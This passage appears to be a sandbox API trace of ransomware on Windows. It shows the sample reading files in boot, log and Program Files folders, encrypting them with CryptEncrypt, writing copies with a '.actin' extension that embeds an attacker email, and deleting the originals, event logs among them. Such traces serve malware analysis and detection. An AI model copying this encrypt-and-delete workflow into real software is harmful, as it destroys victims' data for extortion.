(lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0141.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.001] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.002] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.002] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=42400) returned 1 [0141.002] CloseHandle (hObject=0x2f0) returned 1 [0141.002] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui")) returned 0x20 [0141.002] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.002] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.003] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=63832) returned 1 [0141.003] CloseHandle (hObject=0x2f0) returned 1 [0141.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0141.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.003] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.003] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.003] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.003] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=42328) returned 1 [0141.003] CloseHandle (hObject=0x2f0) returned 1 [0141.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui")) returned 0x20 [0141.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.003] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.004] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.004] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.004] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=63840) returned 1 [0141.004] CloseHandle (hObject=0x2f0) returned 1 [0141.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0141.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.004] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.004] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.004] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.004] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=42392) returned 1 [0141.004] CloseHandle (hObject=0x2f0) returned 1 [0141.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui")) returned 0x20 [0141.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.005] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.005] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.005] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.007] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=395226) returned 1 [0141.007] CloseHandle (hObject=0x2f0) returned 1 [0141.007] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0141.007] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0141.008] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\bootmgr.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.008] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.009] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x27) returned 0 [0141.009] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.009] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.011] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1118208) returned 1 [0141.011] CloseHandle (hObject=0x2f0) returned 1 [0141.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 0x20 [0141.011] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0x20 [0141.012] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.012] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.012] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1118208) returned 1 [0141.012] CloseHandle (hObject=0x2f0) returned 1 [0141.012] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx")) returned 0x20 [0141.012] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\System.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\system.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0x20 [0141.013] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.013] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.014] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=69632) returned 1 [0141.014] CloseHandle (hObject=0x2f0) returned 1 [0141.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 0x20 [0141.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\windows powershell.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.014] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.014] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.014] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.015] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\windows powershell.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.015] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac34b0) returned 1 [0141.015] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.015] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x11000, lpOverlapped=0x0) returned 1 [0141.247] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x11010, dwBufLen=0x11010 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x11010) returned 1 [0141.247] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x11010, lpOverlapped=0x0) returned 1 [0141.250] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2e30) returned 1 [0141.250] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.250] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0141.250] CryptDestroyKey (hKey=0xac2e30) returned 1 [0141.250] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0141.250] CryptDestroyKey (hKey=0xac34b0) returned 1 [0141.250] CloseHandle (hObject=0x2f0) returned 1 [0141.250] CloseHandle (hObject=0x2f4) returned 1 [0141.253] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 1 [0141.254] SetEvent (hEvent=0x288) returned 1 [0141.255] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.941] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=18624) returned 1 [0141.941] CloseHandle (hObject=0x2f4) returned 1 [0141.941] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 0x20 [0141.941] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.944] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.944] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0141.944] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3330) returned 1 [0141.944] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x48c0, lpOverlapped=0x0) returned 1 [0141.952] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x48d0) returned 1 [0141.952] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x48d0, lpOverlapped=0x0) returned 1 [0141.954] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac34b0) returned 1 [0141.954] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.954] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0141.954] CryptDestroyKey (hKey=0xac34b0) returned 1 [0141.954] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0141.954] CryptDestroyKey (hKey=0xac3330) returned 1 [0141.954] CloseHandle (hObject=0x2f0) returned 1 [0141.954] CloseHandle (hObject=0x2f8) returned 1 [0141.956] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 1 [0141.957] SetEvent (hEvent=0x288) returned 1 [0141.957] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.961] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19136) returned 1 [0141.961] CloseHandle (hObject=0x2f0) returned 1 [0141.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x20 [0141.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.961] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.961] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.961] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac33b0) returned 1 [0141.961] CryptSetKeyParam (hKey=0xac33b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4ac0, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0xac33b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0) returned 1 [0141.970] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4ad0, lpOverlapped=0x0) returned 1 [0141.972] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3330) returned 1 [0141.972] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.972] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x80, dwBufLen=0x80 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x80) returned 1 [0141.972] CryptDestroyKey (hKey=0xac3330) returned 1 [0141.972] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x132, lpOverlapped=0x0) returned 1 [0141.972] CryptDestroyKey (hKey=0xac33b0) returned 1 [0141.972] CloseHandle (hObject=0x2f0) returned 1 [0141.972] CloseHandle (hObject=0x2d8) returned 1 [0141.973] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 1 [0141.974] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.979] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=18624) returned 1 [0141.980] CloseHandle (hObject=0x2f4) returned 1 [0141.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x20 [0141.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 